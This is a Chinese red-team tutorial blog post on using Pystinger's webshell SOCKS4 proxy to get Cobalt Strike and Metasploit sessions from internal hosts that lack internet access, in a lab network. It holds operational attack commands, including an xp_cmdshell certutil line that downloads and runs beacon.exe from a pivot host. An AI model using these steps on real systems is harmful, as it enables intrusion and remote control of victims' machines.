利用Pystinger Socks4上线不出网主机

admin 2021年12月24日06:34:33评论131 views字数 2383阅读7分56秒阅读模式
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。


我们接着前两篇文章继续分享一篇利用Pystinger Socks4代理方式上线不出网主机的姿势,包括单主机和内网多台主机的两种常见场景!!!


项目地址:https://github.com/FunnyWolf/pystinger


相关阅读:

1、利用MSF上线断网主机的思路分享

2、利用goproxy http上线不出网主机


0x01 测试环境

攻击机(Kali):192.168.56.101受害机1(Web):192.168.56.102、192.168.186.3 - 双网卡受害机2(Data):192.168.186.4 - 断网机

0x02 Pystinger简单介绍

Pystinger由服务端webshellstinger_server和客户端stinger_client两部分组成,可通过webshell实现内网SOCK4代理及端口映射,支持php/jsp(x)/aspx三种代理脚本。
利用Pystinger Socks4上线不出网主机


webshell只负责流量转发,大部分建立连接及处理数据的工作由stinger_server完成,stinger_client则用于接收转发过来的流量数据以及与CS/MSF的listener建立TCP连接等。


大致原理如下图,更为详细的原理分析可阅读“奇安信安全服务”公众号中的“红队攻防实践:不出网主机搭建内网隧道新思路”一文进行学习了解。

利用Pystinger Socks4上线不出网主机


0x03 Pystinger上线不出网主机

我们先将Pystinger项目的服务端stinger_server.exe、proxy.aspx通过中国菜刀上传至目标磁盘可读写目录中,访问proxy.aspx返回UTF-8表示正常,接着执行以下命令启动服务端。
start C:inetpubwwwrootstinger_server.exe 0.0.0.0
利用Pystinger Socks4上线不出网主机


注:作者提示不要直接运行D:/XXX/stinger_server.exe,因为这样可能会导致TCP断连。


将客户端stinger_client上传至Kali攻击机的tmp临时目录,然后再执行以下命令将Socks4的代理流量转发到我们Kali攻击机60000端口上,只要把-w参数替换为自己上传的代理脚本地址即可。

root@kali:/tmp# chmod 777 stinger_clientroot@kali:/tmp# ./stinger_client -w http://192.168.56.102/proxy.aspx -l 127.0.0.1 -p 60000
利用Pystinger Socks4上线不出网主机

场景1:单主机上线

已控主机为单主机,不出外网且仅允许访问目标Web的80端口。如遇这种场景时可在执行完以上操作后在CobaltStrike创建一个Listener,HTTP Hosts填127.0.0.1,HTTP Port填60020

利用Pystinger Socks4上线不出网主机

场景2:多主机上线

已控主机为内网其中一台主机,双网卡(192.168.56.X为出网段,192.168.186.X为不出网段),在对不出网段中的其他内网主机进行横向移动上线时可在执行完以上操作后在CobaltStrike创建一个Listener,HTTP Hosts填192.168.186.3,HTTP Port填60020

利用Pystinger Socks4上线不出网主机


配置好监听后生成一个可执行马儿,将该文件放至192.168.186.3的Web服务器中供192.168.186.4断网数据库服务器下载,再利用xp_cmdshell组件执行beacon.exe后即可成功上线,Pystinger客户端那边也收到了相关连接数据。

EXEC master..xp_cmdshell 'certutil -urlcache -split -f http://192.168.186.3/beacon.exe C:ProgramDatabeacon.exe'EXEC master..xp_cmdshell 'C:ProgramDatabeacon.exe'
利用Pystinger Socks4上线不出网主机
利用Pystinger Socks4上线不出网主机

CobaltStrike监听设置

  • 单主机上线:CobaltStrike->Listeners->Add->127.0.0.1:60020

  • 多主机上线:CobaltStrike->Listeners->Add->192.168.186.3:60020

  • 注:目标主机为双网卡时必须用不出网IP段的内网IP地址进行监听才能上线不出网主机;


上线至MSF的利用姿势

Kali攻击机上编辑/etc/proxychains.conf文件,底部添加一条socks4代理:127.0.0.1:60000,添加完成后先执行以下几条命令来验证下是否已经与不出网IP段通了?

root@kali:~# proxychains telnet 192.168.186.4 1433root@kali:~# proxychains curl http://192.168.186.4root@kali:~# proxychains nmap -sT -Pn 192.168.186.4[...SNIP...]


如果通了就再用proxychains来启动msfconsole,用不出网IP段的内网IP地址进行监听即可。原理大家都懂,就不实操截图了...。

root@kali:~# proxychains msfconsole -q[...SNIP...]




关注公众号回复“9527”可免费获取一套HTB靶场文档和视频,1120”安全参考等安全杂志PDF电子版,1208”个人常用高效爆破字典0221”2020年酒仙桥文章打包还在等什么?赶紧点击下方名片关注学习吧!

推 荐 阅 读




利用Pystinger Socks4上线不出网主机
利用Pystinger Socks4上线不出网主机
利用Pystinger Socks4上线不出网主机

欢 迎 私 下 骚 扰



利用Pystinger Socks4上线不出网主机

本文始发于微信公众号(潇湘信安):利用Pystinger Socks4上线不出网主机

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年12月24日06:34:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   利用Pystinger Socks4上线不出网主机https://cn-sec.com/archives/472700.html

发表评论

匿名网友 填写信息